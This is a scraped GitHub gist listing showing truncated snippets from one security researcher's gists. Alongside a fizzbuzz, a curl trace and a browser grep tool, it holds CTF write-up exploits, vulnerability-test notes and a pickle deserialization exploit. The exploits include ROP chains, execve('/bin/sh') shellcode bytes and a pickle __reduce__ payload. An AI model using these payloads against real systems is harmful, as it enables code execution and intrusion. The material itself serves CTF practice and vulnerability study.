
@inaz2
inaz2 / hook.c
Created August 21, 2014 08:03
Hooking library functions
/*
compile:
$ gcc -shared -fPIC -o hook.so hook.c -ldl
*/
#define _GNU_SOURCE
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
@inaz2
inaz2 / gist:7fa449859a35e15b2a8b
Last active August 29, 2015 14:06
case of ad redirection from expired domain
$ curl -v -L -A "Mozilla/5.0" http://www.unoh.net/
* STATE: INIT => CONNECT handle 0x60002d130; line 998 (connection #-5000)
* About to connect() to www.unoh.net port 80 (#0)
* Trying 109.201.133.191...
* Adding handle: conn: 0x600069370
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* 0x60002d130 is at send pipe head!
* - Conn 0 (0x600069370) send_pipe: 1, recv_pipe: 0
import cPickle
import subprocess
import base64
import socket
s = socket.create_connection(('localhost', 5000))
class Exploit(object):
def __reduce__(self):
fd = s.fileno()
@inaz2
inaz2 / fizzbuzz.hs
Last active August 29, 2015 14:14
Haskell fizzbuzz for Python programmers
import Control.Monad
main =
forM_ [1..100] $ \x -> do
if x `mod` 15 == 0 then
putStrLn "fizzbuzz"
else if x `mod` 5 == 0 then
putStrLn "buzz"
else if x `mod` 3 == 0 then
putStrLn "fizz"
@inaz2
inaz2 / env.txt
Last active August 29, 2015 14:15
WordPress pingback + GHOST vulnerability
# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.5 LTS
Release: 12.04
Codename: precise
# /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.6) stable release version 2.15, by Roland McGrath et al.
Copyright (C) 2012 Free Software Foundation, Inc.
@inaz2
inaz2 / env.txt
Last active August 29, 2015 14:15
crash in PHP 5 ereg() function / Full disclosure: heap overflow in H. Spencer’s regex library on 32 bit systems https://guidovranken.wordpress.com/2015/02/04/full-disclosure-heap-overflow-in-h-spencers-regex-library-on-32-bit-systems/
$ uname -a
Linux vm-ubuntu32 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty
@inaz2
inaz2 / oh_my_scanf.py
Last active August 29, 2015 14:15
writeup of Advent Calendar CTF 2014 oh_my_scanf http://adctf2014.katsudon.org/
from roputils import *
p = Proc('./oh_my_scanf')
#p = Proc(host='pwnable.katsudon.org', port=32100)
sc = Shellcode('i386')
buf = 'A' * 28
buf += p32(0x80483e0) # push esp; ret
buf += sc.xor(sc.exec_shell(), '\t\n\v\f\r ') # eliminate whitespace characters for the scanf("%s") attack
@inaz2
inaz2 / result.txt
Last active August 29, 2015 14:16
a minimum test of uninitialized pointer use (CWE-824)
$ uname -a
Linux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty
@inaz2
inaz2 / exploit.py
Last active August 29, 2015 14:27
Security Camp 2015 on-site CTF for Beginners, Senryu (Pwn 300) write-up / https://github.com/rekkusu/seccamp2015ctf
import struct
import socket
from telnetlib import Telnet
senryu1 = '\x8d\x48\x19\x31\xdb'
senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
senryu3 = '\xcd\x80\xff\xe1\x90'
# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'
@inaz2
inaz2 / megrepper.html
Last active August 30, 2015 07:31
Visual grep (目grep) in the browser (HTML5 Canvas + File API)
<!DOCTYPE html>
<html>
<meta charset="UTF-8">
<title>megrepper</title>
<body>
<canvas id="canvas"></canvas>
<div style="position: fixed; left: 160px; display: inline-block;">
<h1>megrepper</h1>
<pre id="edit" style="width: 40em; margin: 0; background-color: #eeeeee">Drag &amp; drop a file on page</pre>
</div>